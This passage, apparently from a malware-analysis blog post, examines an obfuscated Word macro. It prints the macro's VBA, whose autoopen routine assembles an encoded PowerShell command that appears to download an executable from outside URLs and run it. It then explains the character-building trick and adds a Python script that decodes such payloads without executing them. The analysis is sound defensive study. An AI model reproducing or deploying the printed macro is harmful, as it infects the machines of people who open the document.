wBoA GEAZQ BsAHc Acg OQKf7zP = BpAG4 AZwBs ACcAK wAnAGU AJwArA CcAcgA uAG MAbwAn ds84PI = ACs AJw BtAC8A SQBSA FkAWQ bZjAXG = AnAC sAJwBx AFAAY gA1AC cAKwAn AE4AJw ApA C4AUwB lsk59K2 = wAGwA aQB 0ACgAJ wBA ACcA KQA7AC QAa QAw MzvEWt = ADUANQ BhAG wATw BQAD 0AK CSfGq3 = AAn AHQAcA BZA EUAM gBvACc AKw sXIO3j = AnAG 0AMQ AnAC kAOwA kAE wBuzmLiw = qc2z0SEi + Oujhvq7b + QV7zAXF + BzjlMR1F + OQKf7zP + ds84PI + bZjAXG + lsk59K2 + MzvEWt + CSfGq3 + sXIO3j wBuzmLiw = ALgBjAGwAJwArACcAdQBiAC8AeQAnACsAJwA3ACcAKwAnADcAUQBUAEsAaABWAEAAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8ALwBtAGkAYwBoAGEAZQBsAHcAcgBpAG4AZwBsACcAKwAnAGUAJwArACcAcgAuAGMAbwAnACsAJwBtAC8ASQBSAFkAWQAnACsAJwBxAFAAYgA1ACcAKwAnAE4AJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAaQAwADUANQBhAGwATwBQAD0AKAAnAHQAcABZAEUAMgBvACcAKwAnAG0AMQAnACkAOwAkAE End Function Function Mnv94H() On Error Resume Next n8DNvz = kARQB wAEgAa gBqA CAAPQA gACgAJ wA2ADU AJwAr ACcAN AAnAC uAwdTGD5 = kAOw AkA G0AVQ B1AFc AZABG LOw02E5 = AD0A KAAnAF IAM ABhAHE AJwA rACcAM QBsAD AAJw ArACc UaU4Jz1 = ATwA nACkAO wAkA GQA 
RwB CAFQAb mLUvTz7 = AA0AHE APQAk AGU AbgB 2ADoAd nJIQQcw = QBzAG UAcgB wAHI Abw BmA GkA mnhC8GqR = bABlAC sAJwB cACcAK wAkAEk ARQBwA EgAa gBqAC sAKAAn WCrXbI = AC4A ZQA nACs AJwB4 AGU AJwAp ADsAZ gBvA HIAZ Mnv94H = n8DNvz + uAwdTGD5 + LOw02E5 + UaU4Jz1 + mLUvTz7 + nJIQQcw + mnhC8GqR + WCrXbI Mnv94H = kARQBwAEgAagBqACAAPQAgACgAJwA2ADUAJwArACcANAAnACkAOwAkAG0AVQB1AFcAZABGAD0AKAAnAFIAMABhAHEAJwArACcAMQBsADAAJwArACcATwAnACkAOwAkAGQARwBCAFQAbAA0AHEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEkARQBwAEgAagBqACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZ End Function Function Qd66bAu() On Error Resume Next l7cRfN7 = QBh AGM AaAAo ACQATQ A4AF UAMQB6 tuOdbcb = AHcAI ABpAG 4AIAAk AFA AZgB3 AEgAYw BYAFoA UwApA HsAdAB pouJSzs = yAHkA ewAk AEoARw BUADkA aQBZ AE8AY RwmuL9zj = gAuA EQAbw B3AG4 AbA BvAGEA ZABGA GkAbA d1E4tZ = BlACgA JAB NADgAV QAxA HoAd wAsA CAAJ zPOMJu0d = ABk AEcAQ gBU AGwA NABxA CkA OwAk AE8 ARA SfBGzL = B6AEQA SwA5AD MAPQA oACcA ZgAn ACs AJwBqA JnMhEm06 = EgAegB EAGwA cAAnAC sAJwA 1ACcA WuLoWdq = KQA7A EkAZgA gACgA KABHA GUA dAA tAEkA dABlA G0AI d6H2AFR = AAkA GQARw BCAF QAb AA0AHE AKQAuA GwA Qd66bAu = l7cRfN7 + tuOdbcb + pouJSzs + RwmuL9zj + d1E4tZ + zPOMJu0d + SfBGzL + JnMhEm06 + WuLoWdq + d6H2AFR Qd66bAu = QBhAGMAaAAoACQATQA4AFUAMQB6AHcAIABpAG4AIAAkAFAAZgB3AEgAYwBYAFoAUwApAHsAdAByAHkAewAkAEoARwBUADkAaQBZAE8AYgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABNADgAVQAxAHoAdwAsACAAJABkAEcAQgBUAGwANABxACkAOwAkAE8ARAB6AEQASwA5ADMAPQAoACcAZgAnACsAJwBqAEgAegBEAGwAcAAnACsAJwA1ACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGQARwBCAFQAbAA0AHEAKQAuAGwA End Function Function misB743q() On Error Resume Next ADNMmcl = ZQBuA GcA dABo ACAA LQBn AGUA IAA0AD AAMA AwA dUWofu = DAA KQA gAHsAS QBuA HYA sEdLvJE = bwBrAG UALQB JAHQA ZQBtAC AAJA BkAEc d5wpXhz = AQgBU AGwAN ABxA DsAJAB jADcA agBp AFEAMw A9ACg W1qwKF = AJwB 3AG kAJw ArACc AZA AyAFo AVw BZAC cAKQ misB743q = ADNMmcl + dUWofu + sEdLvJE + d5wpXhz + W1qwKF misB743q = 
ZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABkAEcAQgBUAGwANABxADsAJABjADcAagBpAFEAMwA9ACgAJwB3AGkAJwArACcAZAAyAFoAVwBZACcAKQ End Function Function SvYi5Y() On Error Resume Next B6II8P = A7AG IAc gBl AGE AawA 7AH0 AfQ FckbN7Qj = BjA GEAdA BjA GgAe wB9AH 0AJ ABPAHE ASwB pDT9WTn = 3AGQ AcAA 9ACgA JwBYAE 4ASwA nACsA JwBYA EIEU9Tz = EUA SwAnA CkAO wA= SvYi5Y = B6II8P + FckbN7Qj + pDT9WTn + EIEU9Tz SvYi5Y = A7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABPAHEASwB3AGQAcAA9ACgAJwBYAE4ASwAnACsAJwBYAEUASwAnACkAOwA= End Function Sub autoopen() On Error Resume Next pjs7kH = Chr(80) GGS8A1j = Chr(79) DsiufjK pjs7kH + GGS8A1j + UOiYERH + B8waSCi + BIBrlzL + wBuzmLiw + Mnv94H + Qd66bAu + misB743q + SvYi5Y, 0 End Sub
From here, it is pretty simple to understand and to see. Basically, all the strings/variables get concatenated together to form the base64-encoded string. What I found interesting, though, was in the autoopen function and the fact that it was using “KeyCodeConstants” (i.e., KeyCodeConstants.vbKeyP) to help build the script. This is something that I have not seen before in a script. For more information about this, see this page: http://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/keycode-constants. In those two lines, it looks like Chr is being handed the key code constant (80 for vbKeyP and 79 for vbKeyO, as the cleaned-up Chr(80) and Chr(79) show) and returning the ASCII character for that code (P and O respectively). The last line is the one that puts everything together and spells out “POwershell -e” via the Shell function.
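The manual clean-up described above can be scripted. The following is an added example, not code from the original post or from oledump or ViperMonkey: it skips the junk arithmetic lines, evaluates the string concatenations (treating never-assigned variables as empty and the vbKey letter constants as their ASCII codes), and decodes the resulting base64. The VBA sample and the names fA, fB and run are constructed, and it assumes the helper functions appear before autoopen, as they do in the oledump output.

```python
import base64
import re
# Constructed sample in the style of the oledump output; the payload is a harmless "echo hi".
SAMPLE_VBA = '''\
Function fA()
j1 = 123061037 + Rnd(113821029 / ChrB(781545532)) * (k2 * CStr(n3) + (7 * 9 - q4))
Set o4 = m5
s1 = "wersh" + "ell -" + "e Z" + "QBjA"
s2 = "GgAb" + "wAgA"
fA = s1 + s2
End Function
Function fB()
s3 = "GgA" + "aQA="
fB = u1 + s3
End Function
Sub autoopen()
p = x1 + Chr(y1 + KeyCodeConstants.vbKeyP + y2) + x2
o = Chr(KeyCodeConstants.vbKeyO + y3)
run z1 + p + o + fA + fB, 125713 - 125713
End Sub
'''
TERM = r'(?:"[^"]*"|Chr\([^()]*\)|[\w.]+)'  # string literal, Chr(...) or identifier
EXPR = rf'{TERM}(?: \+ {TERM})*'  # only such terms joined by " + "; junk arithmetic fails

def eval_expr(expr, env):
    """Join the terms of a '+' expression; undefined names are Empty, as in VBA."""
    out = ""
    for term in re.findall(TERM, expr):
        if term.startswith("Chr("):  # vbKeyA..vbKeyZ equal the letter's ASCII code
            codes = [ord(k) for k in re.findall(r"vbKey([A-Z])\b", term)]
            out += chr(sum(codes + [int(n) for n in re.findall(r"\b\d+\b", term)]))
        else:  # quoted literal, or a variable that may never have been assigned
            out += term[1:-1] if term[0] == '"' else env.get(term, "")
    return out

def rebuild_command(vba):
    """Skip junk lines, resolve the string assignments, return the command given to Shell."""
    env, command = {}, None
    for line in map(str.strip, vba.splitlines()):
        assign = re.fullmatch(rf"(\w+) = ({EXPR})", line)
        call = re.fullmatch(rf"\w+ ({EXPR}), .*", line)
        if assign:
            env[assign.group(1)] = eval_expr(assign.group(2), env)
        elif call:
            command = eval_expr(call.group(1), env)
    return command

def decode_payload(command):  # PowerShell -e takes base64 of UTF-16LE text
    return base64.b64decode(command.split("-e ", 1)[1]).decode("utf-16-le")
```

Calling `decode_payload(rebuild_command(SAMPLE_VBA))` returns the decoded script text without executing anything, so it can be run against the stream dumped by oledump on an analysis machine.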